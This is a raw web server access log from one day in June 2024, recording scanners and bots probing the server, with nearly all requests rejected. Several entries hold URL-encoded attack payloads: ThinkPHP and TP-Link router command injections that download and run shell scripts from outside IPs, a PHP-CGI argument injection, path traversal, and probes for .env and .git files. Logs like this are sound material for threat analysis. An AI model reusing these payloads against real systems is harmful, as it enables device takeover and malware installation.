64.226.99.8 - - [20/Jun/2024:00:12:20 +0200] "GET / HTTP/1.0" 200 1895 139.59.132.217 - - [20/Jun/2024:00:12:20 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 139.59.154.62 - - [20/Jun/2024:00:12:20 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 139.59.154.62 - - [20/Jun/2024:00:12:20 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 134.209.237.64 - - [20/Jun/2024:00:12:20 +0200] "GET / HTTP/1.1" 200 1895 104.248.41.34 - - [20/Jun/2024:00:12:20 +0200] "-" 400 1930 139.59.154.62 - - [20/Jun/2024:00:12:20 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 52.76.71.100 - - [20/Jun/2024:00:12:21 +0200] "GET /favicon.ico HTTP/1.1" 404 729 205.210.31.71 - - [20/Jun/2024:00:50:54 +0200] "GET / HTTP/1.0" 200 1895 194.165.16.73 - - [20/Jun/2024:00:55:06 +0200] "-" 400 1930 141.98.11.15 - - [20/Jun/2024:01:15:35 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.82 - - [20/Jun/2024:01:20:23 +0200] "GET null HTTP/1.1" 400 1994 141.98.11.82 - - [20/Jun/2024:01:20:23 +0200] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 727 141.98.11.82 - - [20/Jun/2024:01:20:23 +0200] "GET null HTTP/1.1" 400 1994 141.98.11.82 - - [20/Jun/2024:01:20:23 +0200] "GET null HTTP/1.1" 400 1994 141.98.11.82 - - [20/Jun/2024:01:20:24 +0200] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=X%3d%24%28curl%20http%3a%2f%2f185.172.128.93%2fsh%20%7c%7c%20wget%20http%3a%2f%2f185.172.128.93%2fsh%20-O-%29%3b%20echo%20%22%24X%22%20%7c%20sh%20-s%20thinkphp HTTP/1.1" 404 727 45.148.10.174 - - [20/Jun/2024:01:49:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:01:49:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 157.230.107.142 - - [20/Jun/2024:02:07:24 +0200] "-" 400 1930 157.230.107.142 - - [20/Jun/2024:02:07:24 +0200] "-" 400 1930 157.230.107.142 - - [20/Jun/2024:02:07:24 +0200] "-" 400 1930 87.121.69.27 - - [20/Jun/2024:02:10:19 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [20/Jun/2024:02:19:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 34.72.102.176 - - [20/Jun/2024:02:19:47 +0200] "-" 400 1930 64.226.101.204 - - [20/Jun/2024:02:45:04 +0200] "GET / HTTP/1.0" 200 1895 209.38.198.22 - - [20/Jun/2024:02:45:04 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743 139.59.151.131 - - [20/Jun/2024:02:45:04 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723 209.38.210.103 - - [20/Jun/2024:02:45:04 +0200] "GET / HTTP/1.1" 200 1895 165.227.134.160 - - [20/Jun/2024:02:45:04 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 752 134.209.237.134 - - [20/Jun/2024:02:45:04 +0200] "-" 400 1930 165.227.134.160 - - [20/Jun/2024:02:45:04 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742 172.206.148.80 - - [20/Jun/2024:02:50:28 +0200] "-" 400 1930 64.62.197.48 - - [20/Jun/2024:03:07:42 +0200] "GET / HTTP/1.1" 200 1895 64.62.197.54 - - [20/Jun/2024:03:07:59 +0200] "GET /favicon.ico HTTP/1.1" 404 729 64.62.197.49 - - [20/Jun/2024:03:08:10 +0200] "GET /?format=json HTTP/1.1" 200 1895 64.62.197.52 - - [20/Jun/2024:03:08:17 +0200] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 164.90.217.145 - - [20/Jun/2024:03:26:37 +0200] "-" 400 1930 164.90.217.145 - - [20/Jun/2024:03:26:37 +0200] "-" 400 1930 164.90.217.145 - - [20/Jun/2024:03:26:37 +0200] "GET / HTTP/1.1" 200 1895 164.90.217.145 - - [20/Jun/2024:03:26:37 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 115.231.78.12 - - [20/Jun/2024:03:33:34 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [20/Jun/2024:03:34:54 +0200] "GET / HTTP/1.1" 200 1895 115.231.78.12 - - [20/Jun/2024:03:34:54 +0200] "GET /favicon.ico HTTP/1.1" 404 729 115.231.78.12 - - [20/Jun/2024:03:34:55 +0200] "GET /robots.txt HTTP/1.1" 404 728 206.168.32.104 - - [20/Jun/2024:04:00:06 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [20/Jun/2024:04:00:09 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.104 - - [20/Jun/2024:04:00:10 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [20/Jun/2024:04:11:22 +0200] "GET / HTTP/1.1" 200 1895 180.9.161.127 - - [20/Jun/2024:04:28:08 +0200] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 771 45.148.10.174 - - [20/Jun/2024:04:36:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:04:36:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [20/Jun/2024:05:02:13 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.180.48.35 - - [20/Jun/2024:05:04:44 +0200] "-" 400 1930 141.98.11.15 - - [20/Jun/2024:06:08:59 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [20/Jun/2024:06:13:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:06:13:55 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 34.72.102.176 - - [20/Jun/2024:06:56:53 +0200] "-" 400 1930 87.121.69.27 - - [20/Jun/2024:07:09:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 102.129.252.240 - - [20/Jun/2024:07:17:43 +0200] "HEAD / HTTP/1.1" 200 - 78.108.177.54 - - [20/Jun/2024:07:22:13 +0200] "GET / HTTP/1.0" 200 1895 205.210.31.51 - - [20/Jun/2024:07:29:37 +0200] "-" 400 1930 205.210.31.51 - - [20/Jun/2024:07:29:37 +0200] "-" 400 1930 87.251.75.145 - - [20/Jun/2024:07:57:32 +0200] "-" 400 1930 45.88.91.41 - - [20/Jun/2024:08:14:25 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 45.141.86.171 - - [20/Jun/2024:08:23:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [20/Jun/2024:08:24:25 +0200] "GET / HTTP/1.1" 200 1895 39.62.196.175 - - [20/Jun/2024:08:53:30 +0200] "GET / HTTP/1.1" 200 1895 94.156.8.93 - - [20/Jun/2024:09:13:57 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 149.50.103.48 - - [20/Jun/2024:09:24:04 +0200] "GET / HTTP/1.1" 200 1895 184.105.247.244 - - [20/Jun/2024:09:25:06 +0200] "-" 400 1930 45.148.10.174 - - [20/Jun/2024:09:36:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:09:36:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 194.59.31.99 - - [20/Jun/2024:10:42:31 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 106.53.27.90 - - [20/Jun/2024:10:46:01 +0200] "-" 400 1930 45.156.128.41 - - [20/Jun/2024:11:03:16 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [20/Jun/2024:11:10:48 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 95.154.69.217 - - [20/Jun/2024:11:30:29 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [20/Jun/2024:11:34:38 +0200] "GET / HTTP/1.1" 200 1895 94.156.65.231 - - [20/Jun/2024:11:44:23 +0200] "-" 400 1930 94.156.65.231 - - [20/Jun/2024:11:44:26 +0200] "GET / HTTP/1.1" 200 1895 185.191.126.213 - - [20/Jun/2024:11:47:30 +0200] "GET / HTTP/1.1" 200 1895 167.99.93.212 - - [20/Jun/2024:12:08:55 +0200] "GET /aaa9 HTTP/1.1" 404 722 167.99.93.212 - - [20/Jun/2024:12:08:55 +0200] "GET /aab8 HTTP/1.1" 404 722 167.99.93.212 - - [20/Jun/2024:12:08:55 +0200] "GET / HTTP/1.1" 200 1895 45.128.232.152 - - [20/Jun/2024:12:41:58 +0200] "CONNECT example.com:443 HTTP/1.1" 400 804 45.128.232.152 - - [20/Jun/2024:12:41:58 +0200] "-" 400 1930 45.128.232.152 - - [20/Jun/2024:12:41:58 +0200] "-" 400 1930 45.128.232.152 - - [20/Jun/2024:12:41:58 +0200] "-" 400 1930 167.94.138.123 - - [20/Jun/2024:12:48:09 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.123 - - [20/Jun/2024:12:48:12 +0200] "GET / HTTP/1.1" 200 1895 167.94.138.123 - - [20/Jun/2024:12:48:12 +0200] "GET /favicon.ico HTTP/1.1" 404 729 91.92.245.103 - - [20/Jun/2024:12:51:58 +0200] "HEAD / HTTP/1.0" 200 - 91.92.245.103 - - [20/Jun/2024:12:51:58 +0200] "GET /.git/config HTTP/1.1" 404 733 149.50.103.48 - - [20/Jun/2024:13:01:20 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [20/Jun/2024:13:08:31 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 149.50.103.48 - - [20/Jun/2024:13:19:47 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [20/Jun/2024:13:34:02 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 65.109.31.112 - - [20/Jun/2024:14:06:54 +0200] "GET /.env HTTP/1.1" 404 722 45.148.10.174 - - [20/Jun/2024:14:07:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:14:07:38 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 139.59.132.217 - - [20/Jun/2024:14:15:43 +0200] "-" 400 1930 139.59.132.217 - - [20/Jun/2024:14:15:43 +0200] "-" 400 1930 139.59.132.217 - - [20/Jun/2024:14:15:43 +0200] "-" 400 1930 206.168.32.99 - - [20/Jun/2024:14:18:13 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [20/Jun/2024:14:18:16 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.99 - - [20/Jun/2024:14:18:17 +0200] "GET /favicon.ico HTTP/1.1" 404 729 91.92.245.67 - - [20/Jun/2024:14:23:15 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 91.92.245.67 - - [20/Jun/2024:14:23:17 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 80.76.49.130 - - [20/Jun/2024:14:34:59 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 804 31.220.162.253 - - [20/Jun/2024:14:48:17 +0200] "GET / HTTP/1.1" 200 1895 31.220.162.253 - - [20/Jun/2024:14:48:17 +0200] "GET /admin/ HTTP/1.1" 404 728 185.104.184.43 - - [20/Jun/2024:15:13:45 +0200] "GET / HTTP/1.1" 200 1895 185.104.184.43 - - [20/Jun/2024:15:13:46 +0200] "GET /HNAP1/ HTTP/1.1" 404 728 149.50.103.48 - - [20/Jun/2024:15:22:11 +0200] "GET / HTTP/1.1" 200 1895 64.23.188.41 - - [20/Jun/2024:15:23:15 +0200] "-" 400 1930 64.23.188.41 - - [20/Jun/2024:15:23:15 +0200] "-" 400 1930 64.23.188.41 - - [20/Jun/2024:15:23:15 +0200] "GET / HTTP/1.1" 200 1895 64.23.188.41 - - [20/Jun/2024:15:23:16 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 185.91.127.66 - - [20/Jun/2024:15:40:38 +0200] "CONNECT ifconfig.me:443 HTTP/1.1" 400 804 87.121.69.27 - - [20/Jun/2024:15:41:45 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 178.215.236.152 - - [20/Jun/2024:15:55:21 +0200] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804 4.151.38.164 - - [20/Jun/2024:16:01:55 +0200] "GET /actuator/health HTTP/1.1" 404 737 185.244.36.206 - - [20/Jun/2024:16:18:07 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [20/Jun/2024:16:19:02 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [20/Jun/2024:16:19:05 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.110 - - [20/Jun/2024:16:19:05 +0200] "GET /favicon.ico HTTP/1.1" 404 729 149.50.103.48 - - [20/Jun/2024:16:45:44 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:08:26 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 45.148.10.174 - - [20/Jun/2024:17:11:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:17:11:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [20/Jun/2024:17:13:13 +0200] "GET / HTTP/1.1" 200 1895 174.138.2.203 - - [20/Jun/2024:17:16:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:04 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:05 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:06 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:07 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:08 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 174.138.2.203 - - [20/Jun/2024:17:16:12 +0200] "POST /tomcat.jsp HTTP/1.1" 404 728 62.210.90.176 - - [20/Jun/2024:17:32:35 +0200] "HEAD / HTTP/1.1" 200 - 62.210.90.176 - - [20/Jun/2024:17:32:37 +0200] "GET / HTTP/1.1" 200 1895 62.210.90.176 - - [20/Jun/2024:17:32:39 +0200] "-" 400 1930 185.244.36.206 - - [20/Jun/2024:17:54:23 +0200] "GET / HTTP/1.1" 200 1895 4.156.21.66 - - [20/Jun/2024:18:57:53 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [20/Jun/2024:19:21:26 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 185.244.36.206 - - [20/Jun/2024:19:27:50 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [20/Jun/2024:19:33:33 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [20/Jun/2024:19:53:31 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 104.168.70.165 - - [20/Jun/2024:20:04:30 +0200] "GET / HTTP/1.1" 200 1895 103.238.235.115 - - [20/Jun/2024:20:08:44 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [20/Jun/2024:20:18:20 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 206.168.34.122 - - [20/Jun/2024:21:00:22 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.122 - - [20/Jun/2024:21:00:25 +0200] "GET / HTTP/1.1" 200 1895 206.168.34.122 - - [20/Jun/2024:21:00:26 +0200] "GET /favicon.ico HTTP/1.1" 404 729 185.244.36.206 - - [20/Jun/2024:21:34:01 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [20/Jun/2024:21:44:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [20/Jun/2024:21:44:04 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 194.59.31.99 - - [20/Jun/2024:22:06:22 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 206.189.225.181 - - [20/Jun/2024:22:24:54 +0200] "-" 400 1930 206.189.225.181 - - [20/Jun/2024:22:24:55 +0200] "GET / HTTP/1.1" 200 1895 206.189.225.181 - - [20/Jun/2024:22:24:55 +0200] "GET / HTTP/1.1" 200 1895 206.189.225.181 - - [20/Jun/2024:22:24:55 +0200] "GET /server HTTP/1.1" 404 724 206.189.225.181 - - [20/Jun/2024:22:24:55 +0200] "GET /.vscode/sftp.json HTTP/1.1" 404 739 206.189.225.181 - - [20/Jun/2024:22:24:55 +0200] "GET /about HTTP/1.1" 404 723 206.189.225.181 - - [20/Jun/2024:22:24:56 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 744 206.189.225.181 - - [20/Jun/2024:22:24:56 +0200] "GET /v2/_catalog HTTP/1.1" 404 733 206.189.225.181 - - [20/Jun/2024:22:24:56 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 805 206.189.225.181 - - [20/Jun/2024:22:24:56 +0200] "GET /server-status HTTP/1.1" 404 731 206.189.225.181 - - [20/Jun/2024:22:24:56 +0200] "GET /_all_dbs HTTP/1.1" 404 726 206.189.225.181 - - [20/Jun/2024:22:24:56 +0200] "GET /.DS_Store HTTP/1.1" 404 727 206.189.225.181 - - [20/Jun/2024:22:24:57 +0200] "GET /.env HTTP/1.1" 404 722 206.189.225.181 - - [20/Jun/2024:22:24:57 +0200] "GET /.git/config HTTP/1.1" 404 733 206.189.225.181 - - [20/Jun/2024:22:24:57 +0200] "GET /s/530313e27313e20393e2735313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 848 206.189.225.181 - - [20/Jun/2024:22:24:57 +0200] "GET /config.json HTTP/1.1" 404 729 206.189.225.181 - - [20/Jun/2024:22:24:57 +0200] "GET /telescope/requests HTTP/1.1" 404 740 206.189.225.181 - - [20/Jun/2024:22:24:58 +0200] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 200 1895 45.84.89.2 - - [20/Jun/2024:22:24:58 +0200] "-" 400 1930 164.90.170.123 - - [20/Jun/2024:22:32:16 +0200] "-" 400 1930 87.121.69.27 - - [20/Jun/2024:22:32:41 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 164.90.170.123 - - [20/Jun/2024:22:33:31 +0200] "GET /hello HTTP/1.1" 404 723 94.156.8.2 - - [20/Jun/2024:23:15:36 +0200] "CONNECT 185.65.245.140:7227 HTTP/1.1" 400 804 94.156.65.231 - - [20/Jun/2024:23:57:24 +0200] "POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 741 94.156.65.231 - - [20/Jun/2024:23:57:24 +0200] "POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 727 94.156.65.231 - - [20/Jun/2024:23:57:24 +0200] "POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 726 94.156.65.231 - - [20/Jun/2024:23:57:24 +0200] "POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 728